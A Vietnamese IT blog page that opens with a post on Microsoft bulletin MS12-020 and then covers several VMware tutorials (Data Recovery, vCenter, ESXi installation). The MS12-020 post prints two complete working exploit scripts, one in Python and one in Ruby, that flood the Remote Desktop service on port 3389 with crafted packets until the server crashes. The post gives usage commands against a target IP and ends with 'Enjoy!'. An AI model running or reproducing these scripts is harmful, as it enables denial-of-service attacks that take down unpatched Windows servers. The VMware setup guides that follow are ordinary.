Microsoft Security Bulletin MS12-020 – Critical

Ngày 13 tháng 3 năm 2012, Microsoft chính thức công bố lỗi Microsoft Security Bulletin MS12-020 – Critical hầu hết các platforms của Microsoft đều dính chưởng nếu ko update package phù hợp cho từng platform. Xem link dưới để biết thêm chi tiết:

http://technet.microsoft.com/en-us/security/bulletin/ms12-020

còn đây là clip test demo mà Tony làm

http://www.mediafire.com/?dxbxd1ooh7h1487

còn đây là script để test

1. Python: (lưu lại thành MS12-020.py)

#!/usr/bin/env python
#Author: MaYaSeVeN
#Thank BlackBap.Org, Joshua J. Drake(jduck), payload form Chinese
import socket,sys
payload=”\x03\x00\x00\x13\x0e\xe0\x00\x00\x00\x00\x00\x01\x00\x08\x00\x00\x00\x00\x00\x03\x00\x01\xd6\x02\xf0\x80\x7f\x65\x82\x01\x94\x04\x01\x01\x04\x01\x01\x01\x01\xff\x30\x19\x02\x04\x00\x00\x00\x00\x02\x04\x00\x00\x00\x02\x02\x04\x00\x00\x00\x00\x02\x04\x00\x00\x00\x01\x02\x04\x00\x00\x00\x00\x02\x04\x00\x00\x00\x01\x02\x02\xff\xff\x02\x04\x00\x00\x00\x02\x30\x19\x02\x04\x00\x00\x00\x01\x02\x04\x00\x00\x00\x01\x02\x04\x00\x00\x00\x01\x02\x04\x00\x00\x00\x01\x02\x04\x00\x00\x00\x00\x02\x04\x00\x00\x00\x01\x02\x02\x04\x20\x02\x04\x00\x00\x00\x02\x30\x1c\x02\x02\xff\xff\x02\x02\xfc\x17\x02\x02\xff\xff\x02\x04\x00\x00\x00\x01\x02\x04\x00\x00\x00\x00\x02\x04\x00\x00\x00\x01\x02\x02\xff\xff\x02\x04\x00\x00\x00\x02\x04\x82\x01\x33\x00\x05\x00\x14\x7c\x00\x01\x81\x2a\x00\x08\x00\x10\x00\x01\xc0\x00\x44\x75\x63\x61\x81\x1c\x01\xc0\xd8\x00\x04\x00\x08\x00\x80\x02\xe0\x01\x01\xca\x03\xaa\x09\x04\x00\x00\xce\x0e\x00\x00\x48\x00\x4f\x00\x53\x00\x54\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\xca\x01\x00\x00\x00\x00\x00\x10\x00\x07\x00\x01\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x2d\x00\x30\x00\x30\x00\x30\x00\x2d\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x2d\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\xc0\x0c\x00\x0d\x00\x00\x00\x00\x00\x00\x00\x02\xc0\x0c\x00\x1b\x00\x00\x00\x00\x00\x00\x00\x03\xc0\x2c\x00\x03\x00\x00\x00\x72\x64\x70\x64\x72\x00\x00\x00\x00\x00\x80\x80\x63\x6c\x69\x70\x72\x64\x72\x00\x00\x00\xa0\xc0\x72\x64\x70\x73\x6e\x64\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x0c\x02\xf0\x80\x04\x01\x00\x01\x00\x03\x00\x00\x08\x02\xf0\x80\x28\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x06\x03\xef\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x06\x03\xeb\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x06\x03\xec\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x06\x03\xed\x03\x00\x00\x0c\x02\xf0\x80\x38\x00\x06\x03\xee\x03\x00\x00\x0b\x06\xd0\x00\x00\x12\x34\x00″
i = 1
while(1):
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(7)
s.connect((sys.argv[1],3389))
print “Sending: %d packets” % i
s.send(payload)
rec = s.recv(50)
s.close()
i += 1
except:
print “The Server is down”
exit()

2. Ruby: ( lưu lại thành MS12-020.rb)

#!/usr/bin/env ruby

#
# ms12-020 PoC attempt
#
# NOTE: This was crafted based on a legit connection packet capture and reversing
# a packet capture of the the chinese PoC.
#
# by Joshua J. Drake (jduck)
#

require ‘socket’

def send_tpkt(sd, data)
sd.write(make_tpkt(data))
end

def make_tpkt(data)
[
3, # version
0, # reserved
4 + data.length
].pack(‘CCn’) + data
end

def make_x224(data)
[ data.length ].pack(‘C’) + data
end

def make_rdp(type, flags, data)
[ type, flags, 4 + data.length ].pack(‘CCv’) + data
end
host = ARGV.shift

sd = TCPSocket.new(host, 3389)
pkts1 = []

# craft connection request
rdp = make_rdp(1, 0, [ 0 ].pack(‘V’))
x224_1 = make_x224([
0xe0, # Connection request
0, # ??
0, # SRC-REF
0 # Class : Class 0
].pack(‘CnnC’) + rdp)

pkts1 << make_tpkt(x224_1)
# craft connect-initial
x224_2 = make_x224([
0xf0, # Data / Class 0
0x80 # EOT: True / NR: 0
].pack(‘CC’))

# mcsCi
target_params = “”+
#”\x02\x01\x00″+ # maxChannelIds
“\x02\x04\x00\x00\x00\x22″+ # maxChannelIds
“\x02\x04\x00\x00\x00\x0a”+ # maxUserIds
“\x02\x04\x00\x00\x00\x00″+ # maxTokenIds
“\x02\x04\x00\x00\x00\x01″+ # numPriorities
“\x02\x04\x00\x00\x00\x00″+ # minThroughput
“\x02\x04\x00\x00\x00\x01″+ # maxHeight
“\x02\x02\xff\xff”+ # maxMCSPDUSize
“\x02\x04\x00\x00\x00\x02” # protocolVersion
min_params = “”+
“\x02\x04\x00\x00\x00\x01″+ # maxChannelIds
“\x02\x04\x00\x00\x00\x01″+ # maxUserIds
“\x02\x04\x00\x00\x00\x01″+ # maxTokenIds
“\x02\x04\x00\x00\x00\x01″+ # numPriorities
“\x02\x04\x00\x00\x00\x00″+ # minThroughput
“\x02\x04\x00\x00\x00\x01″+ # maxHeight
“\x02\x02\x04\x20″+ # maxMCSPDUSize
“\x02\x04\x00\x00\x00\x02” # protocolVersion
max_params = “”+
“\x02\x02\xff\xff”+ # maxChannelIds
“\x02\x02\xfc\x17″+ # maxUserIds
“\x02\x02\xff\xff”+ # maxTokenIds
“\x02\x04\x00\x00\x00\x01″+ # numPriorities
“\x02\x04\x00\x00\x00\x00″+ # minThroughput
“\x02\x04\x00\x00\x00\x01″+ # maxHeight
“\x02\x02\xff\xff”+ # maxMCSPDUSize
“\x02\x04\x00\x00\x00\x02” # protocolVersion

userdata = “”+
# gccCCrq
“\x00\x05\x00\x14″+
“\x7c\x00\x01\x81\x2a\x00\x08\x00\x10\x00\x01\xc0\x00\x44\x75\x63″+”\x61\x81\x1c”+
# clientCoreData
“\x01\xc0″+”\xd8\x00″+ # header (type, len)
“\x04\x00″+”\x08\x00″+ # version
“\x80\x02″+ # desktop width
“\xe0\x01″+ # desktop height
“\x01\xca”+ # color depth
“\x03\xaa”+ # SASSequence
“\x09\x04\x00\x00” + # keyboard layout
“\xce\x0e\x00\x00” + # client build number
# client name
“\x48\x00\x4f\x00\x53\x00\x54\x00\x00\x00\x00\x00\x00\x00\x00\x00″+
“\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00″+
“\x04\x00\x00\x00″+ # keyboard type
“\x00\x00\x00\x00″+ # kbd subType
“\x0c\x00\x00\x00″+ # kbd FuncKey
# imeFileName
“\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00″+
“\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00″+
“\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00″+
“\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00″+
“\x01\xca”+ # postBeta2ColorDepth
“\x01\x00″+ # clientProductId
“\x00\x00\x00\x00” + # serialNumber
“\x10\x00″+ # highColorDepth
“\x07\x00″+ # supportedColorDepths
“\x01\x00″+ # earlyCapabilityFlags
# clientDigProductId -poc has: “00000-000-0000000-00000”
“\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x2d\x00\x30\x00\x30\x00″+
“\x30\x00\x2d\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00″+
“\x30\x00\x2d\x00\x30\x00\x30\x00\x30\x00\x30\x00\x30\x00\x00\x00″+
“\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00″+
“\x00″+ # connectionType
“\x00″+ # pad1octet
“\x00\x00\x00\x00″+ # serverSelectedProtocol
“\x04\xc0\x0c\x00″+ # desktopPhysicalWidth
“\x0d\x00\x00\x00″+ # desktopPhysicalHeight
“\x00\x00\x00\x00″+ # reserved
# clientSecurityData
“\x02\xc0″+”\x0c\x00″+ # header (type, len)
“\x1b\x00\x00\x00″+ # encryptionMethods
“\x00\x00\x00\x00″+ # extEncryptionMethods
# clientNetworkData
“\x03\xc0″+”\x2c\x00″+ # header (type, len)
“\x03\x00\x00\x00″+ # channel count!
# channel 0
“rdpdr\x00\x00\x00″+ # name
“\x00\x00\x80\x80″+ # options
# channel 1
“cliprdr\x00″+ # name
“\x00\x00\xa0\xc0″+ # options
# channel 2
“rdpsnd\x00\x00″+ # name
“\x00\x00\x00\xc0” # options
# clientClusterData (not present)
# clientMonitorData (not present)

mcs_data = “”+
“\x04\x01\x01″+ # callingDomainSelector
“\x04\x01\x01″+ # calledDomainSelector
“\x01\x01\xff”+ # upwardFlag
#”\x30″ + [ target_params.length ].pack(‘C’) + target_params +
#”\x30″ + [ min_params.length ].pack(‘C’) + min_params +
#”\x30” + [ max_params.length ].pack(‘C’) + max_params +
“\x30” + [ 0x19 ].pack(‘C’) + target_params +
“\x30” + [ 0x19 ].pack(‘C’) + min_params +
“\x30” + [ 0x1c ].pack(‘C’) + max_params +
# userData
“\x04\x82” + [ userdata.length ].pack(‘n’) + userdata

#mcs = “\x7f\x65\x82” + [ mcs_data.length ].pack(‘n’) # connect-initial (0x65 / 101), length
mcs = “\x7f\x65\x82” + [ 0x194 ].pack(‘n’) # connect-initial (0x65 / 101), length
mcs << mcs_data

pkts1 << make_tpkt(x224_2 + mcs)
# send a special one?
pkts1 << make_tpkt(x224_2 + “\x04\x01\x00\x01\x00”)

# send more pkts! – based on poc
10.times {
pkts1 << make_tpkt(x224_2 + “\x28”)
}

pkts1 << make_tpkt(x224_2 + “\x38\x00\x06\x03\xea”)
pkts1 << make_tpkt(x224_2 + “\x38\x00\x06\x03\xeb”)
pkts1 << make_tpkt(x224_2 + “\x38\x00\x06\x03\xec”)
pkts1 << make_tpkt(x224_2 + “\x38\x00\x06\x03\xed”)
pkts1 << make_tpkt(x224_2 + “\x38\x00\x06\x03\xee”)
pkts1 << make_tpkt(x224_2 + “\x38\x00\x06\x03\xf0”)
pkts1 << make_tpkt(x224_2 + “\x38\x00\x06\x03\xf1”)
pkts1 << make_tpkt(x224_2 + “\x38\x00\x06\x03\xf2”)
pkts1 << make_tpkt(x224_2 + “\x38\x00\x06\x03\xf3”)

pkts1 << make_tpkt(x224_2 + “\x21\x80″)

bigpkt = pkts1.join(”)
i = 0
#loop {
sd.write(bigpkt)

send_tpkt(sd, x224_2 + “\x2e\x00\x00\x01”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x02”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x03”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x04”)

# read connect-initial response
buf = sd.recv(1500)
# XXX: TODO: check response =)
#puts buf
#AAA
sd.write(bigpkt)

send_tpkt(sd, x224_2 + “\x2e\x00\x00\x01”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x02”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x03”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x04”)

# read connect-initial response
buf = sd.recv(1500)
# XXX: TODO: check response =)
#puts buf
sd.write(bigpkt)

send_tpkt(sd, x224_2 + “\x2e\x00\x00\x01”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x02”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x03”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x04”)

# read connect-initial response
buf = sd.recv(1500)
# XXX: TODO: check response =)
#puts buf
sd.write(bigpkt)

send_tpkt(sd, x224_2 + “\x2e\x00\x00\x01”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x02”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x03”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x04”)

# read connect-initial response
buf = sd.recv(1500)
# XXX: TODO: check response =)
#puts buf
sd.write(bigpkt)

send_tpkt(sd, x224_2 + “\x2e\x00\x00\x01”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x02”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x03”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x04”)

# read connect-initial response
buf = sd.recv(1500)
# XXX: TODO: check response =)
#puts buf
sd.write(bigpkt)

send_tpkt(sd, x224_2 + “\x2e\x00\x00\x01”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x02”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x03”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x04”)

# read connect-initial response
buf = sd.recv(1500)
# XXX: TODO: check response =)
#puts buf
sd.write(bigpkt)

send_tpkt(sd, x224_2 + “\x2e\x00\x00\x01”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x02”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x03”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x04”)

# read connect-initial response
buf = sd.recv(1500)
# XXX: TODO: check response =)
#puts buf
sd.write(bigpkt)

send_tpkt(sd, x224_2 + “\x2e\x00\x00\x01”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x02”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x03”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x04”)

# read connect-initial response
buf = sd.recv(1500)
# XXX: TODO: check response =)
#puts buf
sd.write(bigpkt)

send_tpkt(sd, x224_2 + “\x2e\x00\x00\x01”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x02”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x03”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x04”)

# read connect-initial response
buf = sd.recv(1500)
# XXX: TODO: check response =)
#puts buf
sd.write(bigpkt)

send_tpkt(sd, x224_2 + “\x2e\x00\x00\x01”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x02”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x03”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x04”)

# read connect-initial response
buf = sd.recv(1500)
# XXX: TODO: check response =)
#puts buf
sd.write(bigpkt)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x01”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x02”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x03”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x04”)

# read connect-initial response
buf = sd.recv(1500)
# XXX: TODO: check response =)
#puts buf
sd.write(bigpkt)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x01”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x02”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x03”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x04”)

# read connect-initial response
buf = sd.recv(1500)
# XXX: TODO: check response =)
#puts buf
sd.write(bigpkt)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x01”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x02”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x03”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x04”)

# read connect-initial response
buf = sd.recv(1500)
sd.write(bigpkt)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x01”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x02”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x03”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x04”)

buf = sd.recv(1500)
sd.write(bigpkt)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x01”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x02”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x03”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x04”)

buf = sd.recv(1500)
sd.write(bigpkt)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x01”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x02”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x03”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x04”)

buf = sd.recv(1500)
sd.write(bigpkt)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x01”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x02”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x03”)
send_tpkt(sd, x224_2 + “\x2e\x00\x00\x04”)

buf = sd.recv(1500)

#BBB
#}

sd.close

hướng dẫn sử dụng trước khi dùng:

Python:

MS12-020.py 192.168.1.113

Ruby:

ruby.exe MS12-020.rb 192.168.1.113

Tony_nguyen19

Enjoy!

Hướng dẫn cài đặt và cấu hình VMware Data Recovery

VMware Data Recovery tạo ra các bản sao lưu của các máy ảo mà không làm gián đoạn sử dụng hoặc các dữ liệu và dịch vụ mà chúng cung cấp. VMware Data Recovery quản lý các bản sao lưu hiện có, loại bỏ các bản sao lưu khi đã trở thành cũ. Ngoài ra cũng hỗ trợ chống trùng lắp dữ liệu để loại bỏ dữ liệu dư thừa.
VMware Data Recovery được xây dựng trên các VMware vStorage API cho bảo vệ dữ liệu. Được tích hợp với VMware vCenter Server, cho phép bạn tập trung vào việc lập kế hoạch công việc sao lưu. Tích hợp với vCenter Server cũng cho phép các máy ảo được sao lưu, ngay cả khi chúng được di chuyển bằng cách sử dụng VMware VMotion ™ hoặc Vmware Distributed Resource Scheduler (DRS).
VMware Data Recovery sử dụng một appliance máy ảo và một client plug-in để quản lý và khôi phục lại bản sao lưu. Các thiết bị sao lưu được cung cấp ở định dạng ảo hóa mở (OVF). VMware Data Recovery plug-in yêu cầu VMware vSphere client.
Các bản sao lưu có thể được lưu trữ trên các ổ đĩa ảo được hỗ trợ bởi VMware ESX ™. Bạn có thể sử dụng thiết bị lưu trữ qua mạng (SAN), Network Attached Storage (NAS), hoặc Common Internet File System (CIFS) dựa trên lưu trữ như SAMBA. Tất cả các bản sao lưu máy ảo được lưu trữ trong một deduplicated store. VMware Data Recovery hỗ trợ Dịch vụ Volume Shadow Copy (VSS), cung cấp sao lưu dự phòng cơ sở hạ tầng cho một số hệ điều hành Windows.
Hướng dẫn cài đặt:
1.Cài đặt VMware Data Recovery plug-in:
Trước khi cài đặt VMware Data Recovery plug-in yêu cầu là bạn phải có vCenter server và cài đặt VMware vSphere client.
Ở đây mình sử dụng VMwareDataRecovery-1.2.1.1616-369570-i386.iso
Giải nén và cho chạy file autorun -> Data Recovery client plug-in

 

Thực hiện các bước cài đặt đơn giản theo hướng dẫn.

 

Sau khi cài đặt xong, ta mở vSphere client lên đăng nhập vào vCenter server.

 

Vào Solution and application-> Wmware Data Recovery

 

 

2. Cài đặt appliance backup.
Bạn phải cài đặt appliance backup để Data  Recovery có thể hoàn thành việc backup. Ta sử dụng vSphere Client để triển khai appliance backup.
File->Deploy OWF Template…

 

 

Browse về tập tin VMwareDataRecovery_OVF10.ovf nằm trong thư mục VMwareDataRecovery-ovf-i386. Trong file giải nén VMwareDataRecovery-1.2.1.1616-369570-i386.iso lúc nãy.

 

Click next.

 

Click next.
Đặt tên cho appliance, ở đây mình để mặc định

 

Click next

 

Click next.
Chọn nơi lưu trữ thiết bị máy ảo.

 

Chọn định dạng lưu trữ ổ đĩa ảo. Không quan trọng lắm bạn có thể chọn một định dạng mà bạn thích.(nhiều hoặc ít)

 

Click next.
Thiết lập timezone là UTC

 

Click next.
Xem lại các thông số và click Finish.

 

 

Khiển trai đã hoàn thành.
Mở console của máy ảo Vmware Data Recovery. Chọn Configure Network

Thiết lập địa chỉ IP

 

Cấu hình xong , ta save lại.
Vào trình duyệt truy cập địa chỉ IP vừa cấu hình.
Login với user: root/pass: vmw@re

 

Khi login thành công sẽ thấy giao diện.

 

 

 

3.Thiết lập cấu hình hệ thống để thực hiện backup máy ảo.
Vào vSphere Home > Solutions and Applications > VMware Data Recovery
Nhập tên vào và click connect

 

Nhập pass của user có quyền admin vào vCenter.

 

Khi login thành công vào, ta bắt đầu thực hiện cấu hình việc backup.
Nhập lại pass > click next

 

Click phải chọn Add Network Share
Chọn nơi lưu trữ các bản backup.

 

 

Click continue
Nhập vào URL của nơi lưu trữ các bản backup mà bạn muốn.

 

 

Click next.

 

Thực hiện backup máy ảo.
Đặt tên cho việc backup

 

Chọn máy ảo mà bạn muốn backup

 

 

Click next
Thiết lập lịch trình backup

 

Click next

 

Click Finish

Khi thực hiện backup xong ta sẽ thấy thư mục VmwareDtatRrecovery đã được tạo.

 

Phương Thanh- Trọng Tài.

Hướng dẫn tạo Datacenter, Cluster HA và DRS, và Add Host ESX/ESXi trong vCenter 4.1

Xem lại hướng dẫn cài đặt vCenter server 4.1:
http://kenhgiaiphap.vn/Detail/1125/Huong-dan-cai-dat-vCenter-Server.html
Một trong những việc đầu tiên cần cấu hình trong vCenter server để quản trị tập trung các Hypervisor ESX/ESXi cũng như sử dụng các tính năng nâng cao của VMware vSphere:
-Tạo datacenter.
-Tạo cluster HA và DRS
-Add host ESX/ESXi.
Thực hiện:
Mở vSphere client lên và kết nối với vCenter server.

 
 

Click Ignore

 
 

Chuột phải chọn New Datacenter. Ở đây mình đặt tên datacenter là Kenhgiaiphap

 

Sau khi tạo xong datacenter ta chuột phải vào và chọn new Cluster.

 

Ta đặt tên cho cluster và check vào 2 chức năng bên dưới. Click next

Để thiết lập một cluster DRS hoàn toàn tự động chọn “full automated”. Click next

Chọn off và click next.

Chọn enable Host Monitoring: để kích hoạt tính năng giám sát host.
Chọn một chính sách kiểm soát chấp nhận để ngăn chặn các máy ảo được mở lên sử dụng khi tài nguyên bị hạn chế.
Click next

 

Chọn mặc định. Click next

 

Chọn giám sát máy ảo bằng vmware tool. Click next

 

Chọn Diasable EVC. Click next

 

Đối với chính sách swapfile chọn lưu trữ swapfile trong cùng thư mục với các máy ảo (Điều này sẽ tăng tốc độ VMotion). Click next.

 

Xem lại cấu hình cluster và click finish.

 

Cluster HA, DRS đã được tạo.

 

Thực hiện add host ESX/ESXi vào.
Ta chọn cluster vừa tạo chuột phải chọn add hosst.

 

Nhập vào tên hoặc địa chỉ IP của host ESX/ESXi server.
Nhập username và pass tài khoản quản trị. vSphere client sẽ dùng tài khoàn này để kết nối tới host ESX/ESXi server. Click next

Xem lại chi tiết host được add vào và các máy ảo hiện có trên host.click next

 

Để mặc định click next.

 

Khi bạn bật chế độ Lockdown Mode sẽ ngăn chặn user remote vào host. Ở đây mình không chọn, click next.

 

Chọn vị trí đặt máy ảo hiện có trên host. Click next

 

Xem lại và click Finish.

 

Host ESX/ESXi server đã được add vào cluster, ta sẽ thấy được tất cả các máy ảo hiện có trên host.

 

Phương Thanh (kenhgiaiphap.vn)

Cài đặt VMWare vCenter

VMware vCenter Server là hệ thống quản lý cơ sở hạ tầng ảo, tính năng nâng cao của VMware vSphere. Được sử dụng để quản lý tập trung máy chủ của ESXi, cấu hình HA, DRS và vMotion, quản lý các mạng ảo và giao diện của chúng với mạng vật lý.
vCenter server cũng được sử dụng để Provision storage (thậm chí có thể tích hợp với SAN) và tạo ra các máy ảo,…

Hướng dẫn cài đặt:

Ở đây tôi sử dụng Windows Server 2008 Standard R2 x64 để cài vCenter (hệ điều hành cùa vCenter 4.1 yêu cầu là 64bit ).
Bạn cũng có thể sử dụng các hệ điều hành sau:
•    Windows XP Pro SP2 (SP2 required, 64-bit)
•    Windows Server 2003 (SP1 required, 64-bit)
•    Windows Server 2008 (64-bit)
•    Windows Server 2008 R2

Được cài đặt SQL Server 2008 R2 Standard 64-Bit
Thực hiện:
Bước 1:Tạo cơ sở dữ liệu mới cho vCenter 4.1 và kết nối ODBC DSN
Trước khi tao cơ sở dữ liệu trên SQL server bạn cần phải tạo 1 tài khoản domain cho dịch vụ vCenter. Tài khoản này phải nằm trong group Domain Users.

Tài khoản dịch vụ này phải thuộc group Administrator local của máy đang cài vCenter.
Mở SQL Server Management Studio -> kết nối SQL server.
Click chuột phải vào database chọn new database, ở đây mình đặt tên là VCDB.

 
Tạo tài khoản truy xuất database VCDB
Security -> Logins -> Right Click -> New Login
Vào tab User Mapping ->chọn database -> đánh dấu check vào owner

 

Tạo Data Source: chú ý là DNS 64 bit.
Start -> Control Panel -> Administrative Tools -> Data Sources (ODBC).
Vào tab “System” .Click Add.

 
 
Đặt tên cho data source  và nhập tên SQL server vào . Click next

 

Chọn xác thực bằng SQL server, nhập user và pass đã tạo truy xuất database lúc nãy. Click next sẽ hiện thông báo yêu cầu đổi pass.
Bạn quay lại vào Security -> Logins-> vcenter->click chuột phải properties đổi pass.

 

Sau đó nhập lại pass mới và click next

 

 

Chọn database VCDB cho vCenter. Click next

 

Click Finish.
 
Click test data Source
 

Click Ok và đóng ODBC Data Source lại.

 

Bước 2: Cài đặt vCenter:
Bạn down vCenter server 4.1 về. chọn autorun.exe

 

Chọn vCenter server->chọn ngôn ngữ

 
 
Click next.
 
Chấp nhận license->click next

 

 

Nhập user, công ty, và licesen key vào. Nếu bạn không có license thì cài đặt vẫn được tiếp tục (là bản dùng thử 60 ngày)

 

Nhập DSN vào và click next

 
Nhập user và pass được tạo lúc nãy để truy xuất database.
Click next
Nếu database SQL server của vCenter server được thiết lập ở chế độ full recovery sẽ xuất hiện cảnh báo sau.

 
Click ok
Nhập tài khoản dịch vụ đã tạo vào.click next

 
Click next
 

Chọn “Create a standalone Vmware vCenter Servers instance”(do bạn cài vCenter server lần đầu)
Click next

 

Để mặc định->click next. Có thể bị yêu cầu thay đổi port.

 

Chọn “Small(less than 100hosts) (tuỳ thuộc vào bộ nhớ của vCenter server, và thuùy thuộc vào số lượng host mà bạn muốn quản lý). Click next
 

Click install và chương trình bắt đầu tự cài đặt

 
 
Click Finish. Đã cài đặt thành công vCenter Server.
Những phần sau tôi sẽ hướng dẫn các bạn sử dụng vCenter Server.

Phương Thanh (Kenhgiaiphap.vn)

Cài đặt VMWare ESXi 4.1

Cài đặt VMWare ESXi 4.1
VMware ESXi là một sản phẩm của VMware dành cho việc ảo hóa các máy chủ. ESXi cũng là một tập các chuẩn industry như : đô ổn định, hiệu năng (performance),…Có thể coi VMware ESXi là một trong các giải pháp ảo hóa dành cho máy chủ tốt nhất hiện nay.

Trong bài viết này, mình sẽ trình bày cách cài đặt VMware ESXi 4.1 trên Server CISCO UCS C200 M2. Quá trình cài đặt sẽ được thực hiện từ xa! Sử dụng KVM Console trên CISCO UCS C200 M2.

 

Bước 1: Overview

Trước khi đi vào cài đặt, chúng ta cần phân tích một tí về Server CISCO UCS C200 M2 này. Trên Server này có 3 card LAN, nhưng 1 Card sẽ dành cho việc quản lý, cài đặt (Ở đây là mình xài KVM Console). 2 Card còn lại là dành cho truy xuất ra/vào Server.

 

Hình trên là mô hình của mặt sau Server CISCO UCS C200 M2. Như chúng ta thấy số 2 là cổng LAN dành cho quản lý (management), và số 6 là các cổng LAN dành cho truy cập thông thường!

Vì thế, ở đây cổng số 2 chúng ta dùng để kết nối tới Server sử dụng KVM Console. Cổng số 6 sẽ là các Card LAN được dùng cho VMware ESXi.

Bước 2: Setup

Tiến hành sử dụng KVM Console kết nối tới Server CISCO UCS C200 M2. Trước khi Server khởi động lên, chúng ta sẽ tạo ra một Virual Media (ở đây là ổ CD ảo chứa bộ cài đặt).

Trên cửa sổ KVM Console, vào Tool và chọn Launch Virtual Media

Tiến hành chọn bộ cài đặt từ các ổ đĩa của máy Client mà ta đang remote đến server. Hoặc bạn cũng có thể sử dụng trực tiếp các file .ISO cũng được.

OK! Tiến hành khởi động lại Server và thực hiện boot. Màn hình Menu của VMwareESXi hiện ra. Chọn ESXi Installer.

Quá trình boot vào giao diện cài đặt….

Nhấn Enter để vào cài đặt.

Nhấp F11 để đồng ý!

 

Chọn ổ đĩa để cài đặt VMware ESXi và nhấn Enter


Màn hình Confirm hiện ra, bấm F11 để tiến hành cài đặt

Sau khi quá trình cài đặt thành công. Màn hình thông báo hiện ra, ta nhấn Enter để khởi động lại Server

Server khởi động lại xong, màn hình chính của VMware ESXi 4.1 hiện ra.
 

Ở hình trên, ta thấy IP mà VMware ESXi nhận được là 0.0.0.0 vì mình chưa cắm dây LAN vào cổng LAN số 6 như đã nói ở mô hình trên.

Khi kết nối LAN cho cổng số 6, bạn có thể cấu hình cho VMware ESXi nhận IP tự động (DHCP) hoặc tự cấu hình một IP tĩnh (static ip).

Chúc các bạn thành công!

Ngô Duy Khánh (Kenhgiaiphap.Vn)

CiscoPress – CCNA Security Lab Manual

CiscoPress – CCNA Security Lab Manual

Contents

